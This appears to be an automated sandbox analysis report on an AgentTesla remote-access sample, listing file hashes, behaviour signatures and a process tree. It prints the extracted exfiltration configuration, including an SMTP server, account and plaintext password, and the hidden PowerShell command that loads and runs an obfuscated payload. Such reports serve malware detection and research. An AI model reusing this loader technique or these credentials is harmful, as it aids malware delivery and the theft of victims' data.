Analysis
-
max time kernel
98s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
17/01/2025, 01:27
Static task
static1
Behavioral task
behavioral1
Sample
8b1a3325abed1a5e86ef9759aa90644c9a46d4baa806a3be057ce8b5c4de7749.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
8b1a3325abed1a5e86ef9759aa90644c9a46d4baa806a3be057ce8b5c4de7749.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20241007-en
General
-
Target
8b1a3325abed1a5e86ef9759aa90644c9a46d4baa806a3be057ce8b5c4de7749.exe
-
Size
675KB
-
MD5
1fbec4d33c795d74d3fd1af8a82aff53
-
SHA1
b508f538024b04aa708bfc4d11527ec9c853be92
-
SHA256
8b1a3325abed1a5e86ef9759aa90644c9a46d4baa806a3be057ce8b5c4de7749
-
SHA512
0b92aafb7fb60027af83ad483f043be0e6fa460f546cda31652b6e7d0232bb4b01e612ca86a8bd7b2765d0a8b5f2b72c9512191a87654f3a5b3cf8d3e1036961
-
SSDEEP
12288:4gkvgwxI9MhaNkrqsn/6DJ8EfnYiYiZh0AzRYb1gbMgfa:4gk1OnNCz/6NrYkuANYhgk
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
162.254.34.31 - Port:
587 - Username:
[email protected] - Password:
JaR4LTajHPY5 - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Agenttesla family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3228 powershell.exe -
Loads dropped DLL 1 IoCs
pid Process 5048 8b1a3325abed1a5e86ef9759aa90644c9a46d4baa806a3be057ce8b5c4de7749.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 19 4776 msiexec.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 4776 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3228 powershell.exe 4776 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3896 4776 WerFault.exe 96 -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8b1a3325abed1a5e86ef9759aa90644c9a46d4baa806a3be057ce8b5c4de7749.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 3228 powershell.exe 3228 powershell.exe 3228 powershell.exe 3228 powershell.exe 3228 powershell.exe 3228 powershell.exe 3228 powershell.exe 3228 powershell.exe 3228 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3228 powershell.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 3228 powershell.exe Token: SeIncreaseQuotaPrivilege 3228 powershell.exe Token: SeSecurityPrivilege 3228 powershell.exe Token: SeTakeOwnershipPrivilege 3228 powershell.exe Token: SeLoadDriverPrivilege 3228 powershell.exe Token: SeSystemProfilePrivilege 3228 powershell.exe Token: SeSystemtimePrivilege 3228 powershell.exe Token: SeProfSingleProcessPrivilege 3228 powershell.exe Token: SeIncBasePriorityPrivilege 3228 powershell.exe Token: SeCreatePagefilePrivilege 3228 powershell.exe Token: SeBackupPrivilege 3228 powershell.exe Token: SeRestorePrivilege 3228 powershell.exe Token: SeShutdownPrivilege 3228 powershell.exe Token: SeDebugPrivilege 3228 powershell.exe Token: SeSystemEnvironmentPrivilege 3228 powershell.exe Token: SeRemoteShutdownPrivilege 3228 powershell.exe Token: SeUndockPrivilege 3228 powershell.exe Token: SeManageVolumePrivilege 3228 powershell.exe Token: 33 3228 powershell.exe Token: 34 3228 powershell.exe Token: 35 3228 powershell.exe Token: 36 3228 powershell.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 5048 wrote to memory of 3228 5048 8b1a3325abed1a5e86ef9759aa90644c9a46d4baa806a3be057ce8b5c4de7749.exe 83 PID 5048 wrote to memory of 3228 5048 8b1a3325abed1a5e86ef9759aa90644c9a46d4baa806a3be057ce8b5c4de7749.exe 83 PID 5048 wrote to memory of 3228 5048 8b1a3325abed1a5e86ef9759aa90644c9a46d4baa806a3be057ce8b5c4de7749.exe 83 PID 3228 wrote to memory of 4776 3228 powershell.exe 96 PID 3228 wrote to memory of 4776 3228 powershell.exe 96 PID 3228 wrote to memory of 4776 3228 powershell.exe 96 PID 3228 wrote to memory of 4776 3228 powershell.exe 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\8b1a3325abed1a5e86ef9759aa90644c9a46d4baa806a3be057ce8b5c4de7749.exe"C:\Users\Admin\AppData\Local\Temp\8b1a3325abed1a5e86ef9759aa90644c9a46d4baa806a3be057ce8b5c4de7749.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5048 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Unitiveness=gc -raw 'C:\Users\Admin\AppData\Local\Temp\langskggedes\Udbrudt\forfreriske\Fortegningerne224.Tre';$Sequanian=$Unitiveness.SubString(72268,3);.$Sequanian($Unitiveness) "2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3228 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4776 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4776 -s 15844⤵
- Program crash
PID:3896
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4776 -ip 47761⤵PID:2716
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
311KB
MD50cca4b877799abab1d5114219048001f
SHA13201ad6c905cde15c2fa33848584f707d8cfcb3d
SHA25693c1a8b289175a24ac2258f01a7b3455e853e2c490021f28628f90d060170232
SHA512543d744351cbe79c817585ca205a268c52adbf3fbde7044dc69225c387fc819dba1eb8eed9057fd3cd76844b41809610a9295e6bbbcb9e1d1fbda627f304dfc6
-
Filesize
70KB
MD51f675f5bd6e6ddb3b80498213ea9a0c7
SHA1f1996984073ddd59532b87b34b293b1634808db6
SHA2562b92e75250a7e20263bf8434461b0508af2f704ef7679411b348e90fd64163d0
SHA5127a9b02eb1cbb65cb661ebe50fe351dd25019761be750702d65034b1ee5e7c0c6d0a7f52226cc3ce55b091987512b194f70fab3c296bae92e847addfcd2501e23
-
Filesize
7KB
MD559e487d0a38dce3f6be70d153d7b84a0
SHA10c2ca2fb13731c9f5c53d663dd3804a423736c45
SHA256f19f36b3d8c9f78786eb2dc99d7c7ffbfa1c8236843f139c625a60fde3e6b4c3
SHA51242c80f25e3e49a3a81ec20104feacfc9652410d50ef90020e61c889fb0e94b0e54e1214c37f205a9f180a56dc569628a62d2bed868ffceb3bb3bbbc842403735